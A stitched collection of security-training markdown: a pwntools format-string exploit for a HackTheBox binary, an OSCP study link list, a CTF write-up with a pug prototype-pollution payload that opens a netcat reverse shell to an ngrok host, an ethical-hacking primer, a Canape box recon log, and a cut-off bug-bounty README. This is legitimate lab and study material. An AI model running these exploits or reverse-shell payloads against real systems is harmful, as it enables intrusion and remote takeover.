argv, *a, **kw) # for local solve #gdbscript =''' #init-pwndbg #piebase #breakrva 0x138c #continue #'''.format(**locals()) # for remote solve gdbscript = ''' init-pwndbg piebase breakrva 0x1438 continue '''.format(**locals()) ''' exe = './nightmare' elf = context.binary = ELF(exe, checksec=True) context.log_level = 'INFO' sh = start() ''' ''' for i in range(100): try: #sh = process() sh.sendlineafter(b'>', b'1') sh.recvuntil(b'>') print("Iter {}:".format(i)) sh.sendline('%{}$p'.format(i)) sh.recvuntil(b'> ') get = sh.recvlineS() print(get) #sh.close() except EOFError: pass ''' ''' ## 1st method to leak the pie_base and libc_system_address sh.sendlineafter(b'>', b'1') sh.sendlineafter(b'>', '%23$p') sh.recvuntil(b'>') get_leak_pie = sh.recvlineS() leak = int(get_leak_pie, 16) log.success('Leaked pie --> %#0x', leak) pie_base = leak - 13792 log.info('This is the actual pie_base --> %#0x', pie_base) sh.sendlineafter(b'>', b'1') sh.sendlineafter(b'>', '%26$p') sh.recvuntil(b'>') get_leak_libc_system = sh.recvlineS() leaked_libc_system = int(get_leak_libc_system, 16) log.success('Leaked libc system address --> %#0x', leaked_libc_system) ''' ## 2nd method use (since we want to get the offset automatically) ## REFERENCE --> https://docs.pwntools.com/en/stable/fmtstr.html # option local ''' def send_payload(payload): # can determine the correct offset and send our payload auto. sh.sendlineafter(b'>', b'1') sh.sendlineafter(b'>', payload) sh.recvuntil(b'> ') return sh.recvline().strip() # cannot using recvlineS() dunno why.. format_str = FmtStr(execute_fmt=send_payload) leak = int(send_payload('%23$p'), 16) log.success('Leaked pie --> %#0x', leak) pie_base = leak - 13792 log.info('This is the actual pie_base --> %#0x', pie_base) leaked_libc_system = int(send_payload('%26$p'), 16) log.success('Leaked libc system address --> %#0x', leaked_libc_system) libc_system_binary = leaked_libc_system - 1599312 log.info('This is the calculated_libc_system --> %#0x', libc_system_binary) libc_base = libc_system_binary - 0x4c330 log.info('This is the libc_base --> %#0x', libc_base) binsh = libc_base + 0x196031 log.info('This is the binsh strings address --> %#0x', binsh) ## REMEMBERING PIE ENABLED, actually need to elf.address = pie_base (for best practice) printf_got_addr = pie_base + elf.got['printf'] log.info('This is the printf@got addr --> %#0x', printf_got_addr) ## OVERWRITING "printf" with "system" using FmtStr #format_str = FmtStr(execute_fmt=send_payload) format_str.write(printf_got_addr, libc_system_binary) format_str.execute_writes() # perform the writes sh.sendline(b'2') # go to second menu sh.sendline(b'sh') # run shell # can't /bin/sh\x00 ''' ## REMOTE EXPLOIT ## NOTES: I did found different behavior of the binary in remote server, hence the exploit kinda different :( ## But the approach is still the same ''' def send_payload(payload): # can determine the correct offset and send our payload auto. sh.sendlineafter(b'>', b'1') sh.sendlineafter(b'>', payload) sh.recvuntil(b'> ') return sh.recvline().strip() # cannot using recvlineS() dunno why.. ''' exe = './nightmare' elf = context.binary = ELF(exe, checksec=True) context.log_level = 'INFO' library = './libc6_2.31-0ubuntu9_amd64.so' libc = context.binary = ELF(library, checksec=False) ## EXTRA --> need to get the offset first sh = process(exe) # prevent index out of range option = b'1' def send_payload(payload): # can determine the correct offset and send our payload auto. sh.sendlineafter(b'>', option) sh.sendlineafter(b'>', payload) sh.recvuntil(b'> ') return sh.recvline().strip() # cannot using recvlineS() dunno why.. # get offset format_str = FmtStr(execute_fmt=send_payload) sh = start() option = b'2' leak = int(send_payload('%9$p'), 16) log.success('Leaked pie --> %#0x', leak) pie_base = leak - 5333 log.info('This is the actual pie_base --> %#0x', pie_base) leaked_libc_system = int(send_payload('%13$p'), 16) log.success('Leaked libc system address --> %#0x', leaked_libc_system) # use the leaked address to calculate the libc_base by substract the __libc_start_main_ret from libc.blukat libc_base = leaked_libc_system - 0x0270b3 #__libc_start_main_ret log.success('This is the libc_base --> %#0x', libc_base) # use the system address from the libc.blukat #system_addr = libc_base + 0x055410 system_addr = libc_base + libc.sym['system'] log.success('This is the system address --> %#0x', system_addr) # use the binsh_string from the libc.blukat bin_sh_strings = libc_base + 0x1b75aa log.success('This is the /bin/sh address --> %#0x', bin_sh_strings) # calculate printf@got printf_got_addr = pie_base + elf.got['printf'] log.info("printf@got %#0x", elf.got['printf']) log.success('This is the printf@got address --> %#0x', printf_got_addr) ## ANOTHER EXTRA ---> to prevent menu crash, so we can access the option menu ## This is where the behavior is different from the local binary. option = b'1' sh.send(b'1') ## FINAL ONE format_str.write(printf_got_addr, system_addr) format_str.execute_writes() # perform the writes sh.sendline(b'2') sh.sendline(b'sh') sh.interactive() ``` #### NOTES: To get the libc library used, i used the leaked libc_system_address and send it over the libc.blukat ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/4a39d5ee-4f24-416d-ac81-8306ad1ac4f7) > RESULT ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/2f22789d-f1fc-4156-b7cd-dd65a33f72c8) ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/f6c9e01b-bd79-4964-97cb-f329ffcbc9b7) 29. Got the flag! ## FLAG ``` HTB{ar3_y0u_w0k3_y3t!?} ```
# OSCP-Complete-Guide How to prepare for OSCP complete guide http://www.abatchy.com/search/label/OSCP%20Prep How to prepare for OSCP complete guide Below are 5 skills which you have to improve before registering for OSCP > Learn basic of Computer Network, Web application, and Linux > Learn Bash and Python scripting > Enumeration is key in OSCP lab, I repeat Enumeration is key in OSCP Lab and in real world too > Download vulnerable VM machines from vulnhub > Buffer Overflow (BOF) exploitation Below are the free reference before registration of OSCP > https://www.cybrary.it/course/ethical-hacking/ > https://www.cybrary.it/course/web-application-pen-testing/ > https://www.cybrary.it/course/advanced-penetration-testing/ > https://www.offensive-security.com/metasploit-unleashed/ > https://www.cybrary.it/course/python/ Below are the reference for Buffer overflow and exploit developmet for OSCP > http://www.fuzzysecurity.com/tutorials/expDev/1.html > https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ For Bash Scripting > http://www.tldp.org/LDP/Bash-Beginners-Guide/html/ Transferring Files from Linux to Windows & post-exploitation > https://blog.ropnop.com/transferring-files-from-kali-to-windows/ >https://awakened1712.github.io/oscp/oscp-transfer-files/ >https://infosecaddicts.com/transfer-files-linux-windows/ > https://www.cybrary.it/course/post-exploitation-hacking/ Privilege Escalation: > http://www.greyhathacker.net/?p=738 > http://www.fuzzysecurity.com/tutorials/16.html > https://github.com/GDSSecurity/Windows-Exploit-Suggester > http://pwnwiki.io/#!privesc/windows/index.md > https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ > https://payatu.com/guide-linux-privilege-escalation/ > https://github.com/rebootuser/LinEnum > https://www.youtube.com/watch?v=PC_iMqiuIRQ > https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/ Port redirection/tunneling >https://medium.com/@itseranga/ssh-port-forwarding-357f02d75d >https://xapax.gitbooks.io/security/content/port_forwarding_and_tunneling.html Practise Lab online & offline --- Most of this lab help you to understand different attack and (privilege escaltion very very important for OSCP ) > http://overthewire.org/wargames/bandit/ > https://www.explainshell.com/ > https://www.vulnhub.com/?q=kioptrix&sort=date-asc&type=vm > https://www.vulnhub.com/entry/fristileaks-13,133/ > https://www.vulnhub.com/entry/brainpan-1,51/ (Buffer overflow vm) > https://www.vulnhub.com/entry/mr-robot-1,151/ > https://www.vulnhub.com/entry/hacklab-vulnix,48/ > https://www.vulnhub.com/entry/vulnos-2,147/ > https://www.vulnhub.com/entry/sickos-12,144/ > https://www.vulnhub.com/entry/devrandom-scream,47/ > https://www.vulnhub.com/entry/skytower-1,96/ > https://github.com/rapid7/metasploitable3/wiki #OSCP Notes from OSCP training #### Remote Administration #Other http://pastebin.com/5UTLqwa0 https://jivoi.github.io/2015/06/19/oscp-prepare/ OSCP-cheat-sheet https://github.com/mikaelkall/OSCP-cheat-sheet oscp-tools https://github.com/cokebottle/oscp-tools helpful notes, some tips and tricks for oscp exam https://github.com/kyawthiha7/oscp_notes oscp5 https://github.com/sojamo/oscp5 OSCP-Prep https://github.com/slyth11907/Cheatsheets
# CTF HackTheBox 2021 Cyber Apocalypse 2021 - BlitzProp Category: Web, Points: 300 ![info.JPG](images/info.JPG) And attached file: [web_blitzprop.zip](web_blitzprop.zip) # BlitzProp Solution Let's start the docker and browse it: ![index.JPG](images/index.JPG) By intercepting the request/response using [BurpSuite](https://portswigger.net/burp) we can see the following request when we clicked on Submit button: ![submit.JPG](images/submit.JPG) By observing the code on attached [web_blitzprop.zip](web_blitzprop.zip) we can see the file routes/index.js: ```js const path = require('path'); const express = require('express'); const pug = require('pug'); const { unflatten } = require('flat'); const router = express.Router(); router.get('/', (req, res) => { return res.sendFile(path.resolve('views/index.html')); }); router.post('/api/submit', (req, res) => { const { song } = unflatten(req.body); if (song.name.includes('Not Polluting with the boys') || song.name.includes('ASTa la vista baby') || song.name.includes('The Galactic Rhymes') || song.name.includes('The Goose went wild')) { return res.json({ 'response': pug.compile('span Hello #{user}, thank you for letting us know!')({ user:'guest' }) }); } else { return res.json({ 'response': 'Please provide us with the name of an existing song.' }); } }); module.exports = router; ``` We can see the following line: ```js ... 'response': pug.compile('span Hello #{user}, thank you for letting us know!')({ user:'guest' }) ``` ```pug.compile``` function converts a string into a template function and passes the object for reference. We can use [AST-Injection](https://blog.p6.is/AST-Injection/) to get RCE with ```pug.compile```. So Let's replace the request body to the following (from the link below): ```HTTP POST /api/submit HTTP/1.1 Host: 139.59.174.238:32389 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://139.59.174.238:32389/ Content-Type: application/json Origin: http://139.59.174.238:32389 Content-Length: 210 DNT: 1 Connection: close { "song.name": "The Goose went wild", "__proto__.block":{ "type":"Text", "line":"process.mainModule.require('child_process').exec('nc <ip> <port> -e /bin/sh')" } } ``` Now, we can use [ngrok](https://ngrok.com/) to create tunnel from ngrok cloud to our host. Let's do it (tutorial on ngrok website): ```console ┌─[evyatar@parrot]─[/ctf_htb/cyber_apocalypse/web/blitzprop] └──╼ $ unzip /path/to/ngrok.zip ┌─[evyatar@parrot]─[/ctf_htb/cyber_apocalypse/web/blitzprop] └──╼ $ ./ngrok authtoken <YOUR_TOKEN> ┌─[evyatar@parrot]─[/ctf_htb/cyber_apocalypse/web/blitzprop] └──╼ $ ./ngrok tcp 5533 ngrok by @inconshreveable (Ctrl+C to quit) Session Status online Account [email protected] Version 2.3.39 Region United States (us) Web Interface http://127.0.0.1:4040 Forwarding tcp://3.tcp.ngrok.io:11163 -> localhost:5533 Connections ttl opn rt1 rt5 p50 p90 3 0 0.00 0.00 0.00 314.51 ``` Now, Listen on port 5533 using nc: ``` ┌─[evyatar@parrot]─[/ctf_htb/cyber_apocalypse/web/blitzprop] └──╼ $ nc -lvp 5533 listening on [any] 5533 ... ``` Sending the following HTTP request: ```HTTP POST /api/submit HTTP/1.1 Host: 139.59.174.238:32389 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://139.59.174.238:32389/ Content-Type: application/json Origin: http://139.59.174.238:32389 Content-Length: 210 DNT: 1 Connection: close { "song.name": "The Goose went wild", "__proto__.block":{ "type":"Text", "line":"process.mainModule.require('child_process').exec('nc 3.tcp.ngrok.io 11163 -e /bin/sh')" } } ``` Shell: ```console listening on [any] 5533 ... connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 53498 whoami nobody ls flagJfmNf index.js node_modules package.json routes static views yarn.lock cat flagJfmNf CHTB{p0llute_with_styl3} ``` And we get the flag: ```CHTB{p0llute_with_styl3}```.
# Ethical-Hacking-Tools <br> [![forthebadge](https://forthebadge.com/images/badges/built-with-love.svg)](https://forthebadge.com) <br> ![https://github.com/hhhrrrttt222111/Ethical-Hacking-Tools/network/members](https://img.shields.io/github/forks/hhhrrrttt222111/Ethical-Hacking-Tools?color=green) &nbsp; ![https://github.com/hhhrrrttt222111/Ethical-Hacking-Tools/stargazers](https://img.shields.io/github/stars/hhhrrrttt222111/Ethical-Hacking-Tools?color=red) &nbsp; ![https://github.com/hhhrrrttt222111/Ethical-Hacking-Tools/watchers](https://img.shields.io/github/watchers/hhhrrrttt222111/Ethical-Hacking-Tools?color=yellow) &nbsp; ### Show some :green_heart: and :star: the Repo to SUPPORT <br> ## DOWNLOAD ### [Kali Linux](https://www.kali.org/downloads/) &nbsp; &nbsp; :dragon: <br> ### [Parrot OS](https://parrotsec.org/download/) &nbsp;&nbsp; :parrot: <br> ### [Remnux](https://remnux.org/#distro) &nbsp;&nbsp; :bee: ### [bWAPP](https://sourceforge.net/projects/bwapp/files/bee-box/) &nbsp;&nbsp; :computer: ### [OWASP Juice Shop](https://owasp.org/www-project-juice-shop/) &nbsp;&nbsp; :tropical_drink: <br><br> ## What is Hacking? :space_invader: #### <i>Hacking is identifying weakness in computer systems or networks to exploit its weaknesses to gain access.</i> <p>Hacking can be carried out in many ways. The most common form is the phishing scam, where hackers attempt to gain login names and passwords, or introduce malware into networked computing environments, by tricking users into opening an email attachment or forwarding private information. Some of the most serious breaches of recent years, including the Wannacry malware attack, began as phishing scams, affecting not just the target enterprise but associated partners, customers, government agencies and others.</p> <br> ## Who is a hacker? :man_technologist: <p>A Hacker is a person who finds and exploits the weakness in computer systems and/or networks to gain access. Hackers are usually skilled computer programmers with knowledge of computer security. Hackers are classified according to the intent of their actions. The following list classifies hackers according to their intent.</p> * [White hat](https://en.wikipedia.org/wiki/White_hat_(computer_security)) &nbsp; A hacker who gains access to systems with a view to fix the identified weaknesses. They may also perform penetration Testing and vulnerability assessments * [Black hat](https://en.wikipedia.org/wiki/Black_hat_(computer_security)) &nbsp; A hacker who gains unauthorized access to computer systems for personal gain. The intent is usually to steal corporate data, violate privacy rights, transfer funds from bank accounts etc. * [Grey hat](https://en.wikipedia.org/wiki/Grey_hat) &nbsp; A hacker who is in between ethical and black hat hackers. He/she breaks into computer systems without authority with a view to identify weaknesses and reveal them to the system owner. <br> ## What is Ethical-Hacking? <p>Ethical Hacking sometimes called as Penetration Testing is an act of intruding/penetrating into system or networks to find out threats, vulnerabilities in those systems which a malicious attacker may find and exploit causing loss of data, financial loss or other major damages. The purpose of ethical hacking is to improve the security of the network or systems by fixing the vulnerabilities found during testing. Ethical hackers may use the same methods and tools used by the malicious hackers but with the permission of the authorized person for the purpose of improving the security and defending the systems from attacks by malicious users. Ethical hackers are expected to report all the vulnerabilities and weakness found during the process to the management.</p> <br> ## What is Cybersecurity? :computer: <p>Cybersecurity is the practice of protecting systems, networks, and programs from digital attacks. These cyberattacks are usually aimed at accessing, changing, or destroying sensitive information; extorting money from users; or interrupting normal business processes.</p> <br> ## What are Ethical-Hacking-Tools? :man_technologist: :hammer_and_wrench: <p>Hacking Tools are computer programs and scripts that help you find and exploit weaknesses in computer systems, web applications, servers and networks. There are a variety of such tools available on the market. Some of them are open source while others are commercial solutions.</p> <br> ## What is CTF? :triangular_flag_on_post: <p> CTF (Capture The Flag) is a kind of information security competition that challenges contestants to solve a variety of tasks ranging from a scavenger hunt on wikipedia to basic programming exercises, to hacking your way into a server to steal data. In these challenges, the contestant is usually asked to find a specific piece of text that may be hidden on the server or behind a webpage. This goal is called the flag, hence the name! Like many competitions, the skill level for CTFs varies between the events. Some are targeted towards professionals with experience operating on cyber security teams. These typically offer a large cash reward and can be held at a specific physical location.</p> <br> ## What is Cryptography? :currency_exchange: <p>Cryptography is the study of secure communications techniques that allow only the sender and intended recipient of a message to view its contents.When transmitting electronic data, the most common use of cryptography is to encrypt and decrypt email and other plain-text messages.Modern cryptography uses sophisticated mathematical equations (algorithms) and secret keys to encrypt and decrypt data. Today, cryptography is used to provide secrecy and integrity to our data, and both authentication and anonymity to our communications.An example of basic cryptography is an encrypted message in which letters are replaced with other characters. To decode the encrypted contents, you would need a grid or table that defines how the letters are transposed.</p> <br> ## Community Resources and Environments <p> There are a lot of resources out there in order to help you get started with Ethical Hacking. These range from YouTube tutorials to virtual lab environments where you can hone your skills. # YouTube Channels * [IppSec](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) * [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw) * [IT Security Labs](https://www.youtube.com/channel/UCXPdZsu8g1nKerd-o5A75vA) * [Hak5](https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ) * [LiveOverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) * [Null Byte](https://www.youtube.com/c/NullByteWHT) * [JohnHammond010](https://www.youtube.com/c/JohnHammond010/videos) # Virtual Testing Environments * [VulnHub](https://www.vulnhub.com/) - Through VulnHub, you can download VMs that have known vulnerabilities, your task is to break into these and find the flags that have been listed by the creator. This is a free service, you download the VM and run it in your VM program of choice * [Hack The Box](https://www.hackthebox.eu/) - In order to even get signed up to Hack the Box, you need to hack into the site. Once in, you will find a load of pre-made vulnerable boxes. No VM programs are needed here as you access them all through a VPN. There is a free tier but in order to access the retired machines you need to pay a subscription. * [Try Hack Me](https://tryhackme.com/) - Similar to Hack the Box but with a more guided learning approach. You can enroll yourself in "classes" that will help you through what to look for when hacking a machine. Again, all machines are accessed via a VPN. Subscription is required for most of the content here <br><br><br> ## The 10 most common cyber attack types: 1) [Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks](https://blog.netwrix.com/2018/05/15/top-10-most-common-types-of-cyber-attacks/#Denial-of-service%20(DoS)%20and%20distributed%20denial-of-service%20(DDoS)%20attacks) &nbsp; <br> 2) [Man-in-the-middle (MitM) attack](https://blog.netwrix.com/2018/05/15/top-10-most-common-types-of-cyber-attacks/#Man-in-the-middle%20(MitM)%20attack) &nbsp; <br> 3) [Phishing and spear phishing attacks](https://blog.netwrix.com/2018/05/15/top-10-most-common-types-of-cyber-attacks/#Phishing%20and%20spear%20phishing%20attacks) &nbsp; <br> 4) [Drive-by attack](https://blog.netwrix.com/2018/05/15/top-10-most-common-types-of-cyber-attacks/#Drive-by%20attack) &nbsp; <br> 5) [Password attack](https://blog.netwrix.com/2018/05/15/top-10-most-common-types-of-cyber-attacks/#Password%20attack) &nbsp; <br> 6) [SQL injection attack](https://blog.netwrix.com/2018/05/15/top-10-most-common-types-of-cyber-attacks/#SQL%20injection%20attack) &nbsp; <br> 7) [Cross-site scripting (XSS) attack](https://blog.netwrix.com/2018/05/15/top-10-most-common-types-of-cyber-attacks/#Cross-site%20scripting%20(XSS)%20attack) &nbsp; <br> 8) [Eavesdropping attack](https://blog.netwrix.com/2018/05/15/top-10-most-common-types-of-cyber-attacks/#Eavesdropping%20attack) &nbsp; <br> 9) [Birthday attack](https://blog.netwrix.com/2018/05/15/top-10-most-common-types-of-cyber-attacks/#Birthday%20attack) &nbsp; <br> 10) [Malware attack](https://blog.netwrix.com/2018/05/15/top-10-most-common-types-of-cyber-attacks/#Malware%20attack) &nbsp; <br> <br> ## Phases of Ethical Hacking 1) Planning and Reconnaissance 2) Scanning 3) Gaining Access 4) Maintaining Access 5) Analysis and WAF configuration ## Certifications [Certified Ethical Hacker | CEH Certification](https://www.eccouncil.org/programs/certified-ethical-hacker-ceh/) &nbsp; <br> #### More tools and tutorials coming your way soon !!
# MACHINE CHALLENGE: CANAPE ## Challenge Description ##### Own system Type below the hash that is inside the root.txt file in the machine. The file can be found under /root on Linux machines and at the Desktop of the Administrator on Windows. ##### Own User Type below the hash that is inside the user.txt file in the machine. The file can be found under /home/{username} on Linux machines and at the Desktop of the user on Windows. ``` IP Address: 10.10.10.70 OS: Linux ``` ### PORTSCANNING w/ NMAP As always, we start with a `nmap` portscan.. ``` nmap -p0-10000 -n -sS -T4 10.10.10.70 -A [sudo] password for fortyfunbobby: Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-12 17:35 EDT Nmap scan report for 10.10.10.70 Host is up (0.55s latency). Not shown: 10000 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-git: | 10.10.10.70:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... | Last commit message: final # Please enter the commit message for your changes. Li... | Remotes: |_ http://git.canape.htb/simpsons.git |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Simpsons Fan Site |_http-trane-info: Problem with XML parsing of /evox/about Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 4.8 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 659.23 ms 10.10.16.1 2 659.35 ms 10.10.10.70 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 98.93 seconds ``` So we have port 80 opened (HTTP), but what is particularly interesting is that we've appeared to discover a GIT repo there. One thing to note is that `canape` in French translates to `couch` in English. ### ENUMERATE Manually browsing through the site, we see three pages: 1. home 2. a display page 3. a submit page. <img src="browser-index.jpg" width=500px> <img src="browser-quotes.jpg" width=500px> <img src="browser-submit.jpg" width=500px> Attempting to `gobuster` didn't seem to work.. ``` $ gobuster -e -u 10.10.10.70 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ===================================================== Gobuster v2.0.0 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://10.10.10.70/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes : 200,204,301,302,307,403 [+] Expanded : true [+] Timeout : 10s ===================================================== 2018/09/10 23:43:23 Starting gobuster ===================================================== 2018/09/10 23:43:26 [-] Wildcard response found: http://10.10.10.70/7337eca9-2e89-41e5-a58e-f32d482d5886 => 200 2018/09/10 23:43:26 [!] To force processing of Wildcard responses, specify the '-fw' switch. ===================================================== 2018/09/10 23:43:26 Finished ===================================================== ``` On the home page, we make a note that the "View Quotes" page is advertised as a "CouchDB-powered quotes database" and ties into the theme of the name of the box. Could it be we are looking at a `couchdb` type of vulnerability? ``` msf > search couchdb [!] Module database cache not built yet, using slow search Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/scanner/couchdb/couchdb_enum normal CouchDB Enum Utility auxiliary/scanner/couchdb/couchdb_login normal CouchDB Login Utility exploit/linux/http/apache_couchdb_cmd_exec 2016-04-06 excellent Apache CouchDB Arbitrary Command Execution msf > use auxiliary/scanner/couchdb/couchdb_enum ``` ### GIT Let's investigate that GIT repository a bit further. Found a set of scripts that can help us enumerate the `git` repository (`https://github.com/internetwache/GitTools`) ``` $ python3 gitfinder.py -i git-domains.txt ########### # Finder is part of https://github.com/internetwache/GitTools # # Developed and maintained by @gehaxelt from @internetwache # # Use at your own risk. Usage might be illegal in certain circumstances. # Only for educational purposes! ########### Scanning... [*] Found: 10.10.10.70 Finished ``` Just playing around with the first script. It confirms what we already know - that `canape` has a publicly accessible `.git` repository. Now let's use the "dumper" tool to try and download as much as we can from the `.git` repository.. ``` $ ../../scripts/enum-tools/gittools/Dumper/gitdumper.sh http://10.10.10.70/.git/ git-extract ########### # GitDumper is part of https://github.com/internetwache/GitTools # # Developed and maintained by @gehaxelt from @internetwache # # Use at your own risk. Usage might be illegal in certain circumstances. # Only for educational purposes! ########### [*] Destination folder does not exist [+] Creating git-extract/.git/ [+] Downloaded: HEAD [-] Downloaded: objects/info/packs [+] Downloaded: description [+] Downloaded: config [+] Downloaded: COMMIT_EDITMSG [+] Downloaded: index [-] Downloaded: packed-refs [+] Downloaded: refs/heads/master [-] Downloaded: refs/remotes/origin/HEAD <...> [+] Downloaded: objects/8f/f4a29c06d1548800ab1d5a2a3cdca0c2d5a775 [+] Downloaded: objects/70/9903c653c0d38384f7ca0a5718153f18ec2b34 [+] Downloaded: objects/3e/f8376074e55faaaa9c7b13907f006f90041a75 [+] Downloaded: objects/b0/aa5f89568b2b0753f873a7c59ca2b784c2e600 [+] Downloaded: objects/a7/3c17a0f0709cf6771324811a8a1b60d82b9e36 ``` And finally, now that we have pulled down the `.git` repo, we try the "extractor" script to recover the `.git` commits and their contents.. ``` extractor.sh git-extract git-dump ``` ``` $ ../../scripts/enum-tools/gittools/Extractor/extractor.sh git-extract git-dump ########### # Extractor is part of https://github.com/internetwache/GitTools # # Developed and maintained by @gehaxelt from @internetwache # # Use at your own risk. Usage might be illegal in certain circumstances. # Only for educational purposes! ########### [*] Destination folder does not exist [*] Creating... [+] Found commit: 92eb5eb61f16b7b89be0a7ac0a6c2455d377bb41 [+] Found file: /home/fortyfunbobby/hackthebox/machines/canape/git-dump/0-92eb5eb61f16b7b89be0a7ac0a6c2455d377bb41/__init__.py <...> [+] Found file: /home/fortyfunbobby/hackthebox/machines/canape/git-dump/12-e7bfbcf62cb61ca9f679d5fbfc82a491f580fccd/templates/index.html [+] Found file: /home/fortyfunbobby/hackthebox/machines/canape/git-dump/12-e7bfbcf62cb61ca9f679d5fbfc82a491f580fccd/templates/layout.html [+] Found file: /home/fortyfunbobby/hackthebox/machines/canape/git-dump/12-e7bfbcf62cb61ca9f679d5fbfc82a491f580fccd/templates/quotes.html [+] Found file: /home/fortyfunbobby/hackthebox/machines/canape/git-dump/12-e7bfbcf62cb61ca9f679d5fbfc82a491f580fccd/templates/submit.html ``` ### NMAP REVISITED After chasing the `couchdb` and `git` lead and getting frustrated, decided to run a full `nmap` scan and look what we found hidden all the way at the end of the port range.. `ssh`~ ``` $ sudo nmap -p65535 -n -sS -T4 10.10.10.70 -A Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-16 01:28 EDT Nmap scan report for 10.10.10.70 Host is up (0.70s latency). PORT STATE SERVICE VERSION 65535/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8d:82:0b:31:90:e4:c8:85:b2:53:8b:a1:7c:3b:65:e1 (RSA) | 256 22:fc:6e:c3:55:00:85:0f:24:bf:f5:79:6c:92:8b:68 (ECDSA) |_ 256 0d:91:27:51:80:5e:2b:a3:81:0d:e9:d8:5c:9b:77:35 (ED25519) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.13 (89%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Android 4.1.1 (86%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 65535/tcp) HOP RTT ADDRESS 1 715.93 ms 10.10.16.1 2 715.99 ms 10.10.10.70 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 31.13 seconds ``` ### RETIRED So the machine was retired before I could make any further progress, but I assume the next steps would have been to analyze the webapp source code we had just pulled and likely that would have allowed us to find some way to get a foothold into the machine (probably something to do with couchdb).
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1> Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. 👑 ## Stats King ![OFJAAAH](https://github-readme-stats.vercel.app/api?username=KingOfBugbounty&show_icons=true&theme=dracula) [![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=703ff752fd6f&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge) ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) <div> <a href="https://www.linkedin.com/in/atjunior/"><img src="https://img.shields.io/badge/LinkedIn-0077B5?style=for-the-badge&logo=linkedin&logoColor=white"></img></a> <a href="https://www.youtube.com/c/OFJAAAH"><img src="https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white"></a> </div> ## BugBuntu Download - [BugBuntu](https://sourceforge.net/projects/bugbuntu/) - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) ## Special thanks - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) - [@zseano](https://twitter.com/zseano) - [@pry0cc](https://twitter.com/pry0cc) - [@wellpunk](https://twitter.com/wellpunk) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Amass](https://github.com/OWASP/Amass) - [Anew](https://github.com/tomnomnom/anew) - [Anti-burl](https://github.com/tomnomnom/hacks/tree/master/anti-burl) - [Assetfinder](https://github.com/tomnomnom/assetfinder) - 